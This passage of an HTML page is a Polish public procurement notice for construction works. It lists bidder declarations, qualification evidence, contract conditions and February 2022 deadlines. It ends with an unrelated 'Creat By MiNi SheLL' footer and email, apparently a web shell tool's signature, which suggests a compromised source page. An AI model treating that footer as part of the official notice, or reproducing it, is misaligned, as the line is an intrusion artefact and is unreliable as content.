powyższy warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	OŚWIADCZENIA I DOKUMENTY SKŁADANE WRAZ Z OFERTĄ. <br/><br/>1.1.	Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej i opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Ofertę należy sporządzić zgodnie z Formularzem oferty stanowiącym Załącznik nr 1 do SWZ.<br/><br/>1.2.	Do oferty Wykonawca dołącza:<br/><br/>a)	oświadczenie o niepodleganiu wykluczeniu z postępowania, którego wzór stanowi Załącznik nr 2 do SWZ,<br/>b)	oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi Załącznik nr 3 do SWZ<br/>w zakresie wskazanym w Rozdziale VA ust. 1 i 2 i w Rozdziale XV ust. 1 i ust. 2 stanowią dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w Rozdziale VB, ust. 2 SWZ.<br/><br/>1.3.	Oświadczenia, o których mowa w Rozdziale VB, ust. 1 pkt. 1.2 SWZ składają odrębnie:<br/>1.3.1.	Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenia potwierdzają brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>1.3.2.	podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenia potwierdzają brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>1.4.	Do oferty Wykonawca zobowiązany jest załączyć:<br/>1.4.1.	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w Rozdziale VB ust. 1 ppkt 1.4.1. SWZ<br/>1.4.2.	zobowiązanie, o którym mowa w Rozdziale VD ust. 3 i 4 SWZ w przypadku polegania na zasobach podmiotu udostepniającego zasób Wykonawcy<br/>1.4.3.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: pełnomocnictwo, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności wskazanie: <br/><br/>- postępowania o zamówienie publicznego, którego dotyczy, <br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>- ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/><br/>1.5.	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w Rozdziale VB, ust. 1, ppkt. 1.4.1. SWZ, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>1.6.	Zapisy Rozdziału VB, ust. 1, ppkt. 1.4.2. SWZ stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>1.7.	Zapisy Rozdziału VB, ust. 1, ppkt. 1.4.1. i ppkt 1.4.2., pkt 1.5 SWZ stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp.<br/>1.8.	Kosztorysy ofertowe. Zamawiający dopuszcza złożenie kosztorysu ofertowego w wersji uproszczonej.<br/>1.9.	Dokumenty zawierające informacje stanowiące tajemnicę przedsiębiorstwa (jeżeli dotyczy).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1.	Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>2.1.1.	Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego zgodnie z zał. nr 5 do SWZ, zawierającego: <br/>a) Kierownik z uprawnieniami konstrukcyjno - budowlanymi, posiadający uprawnienia do kierowania robotami budowlanymi w zakresie obejmującym przedmiot zamówienia,<br/>2.1.2. Wykaz robót należytego wykonania zadania zgodnie z pkt. 2.4 SWZ – zał. nr 9 do SWZ wraz z referencjami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o dzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3.	W przypadku, o którym mowa w ust. 2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Miejsce składania ofert: Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia,zmiany lub wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również naminiPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com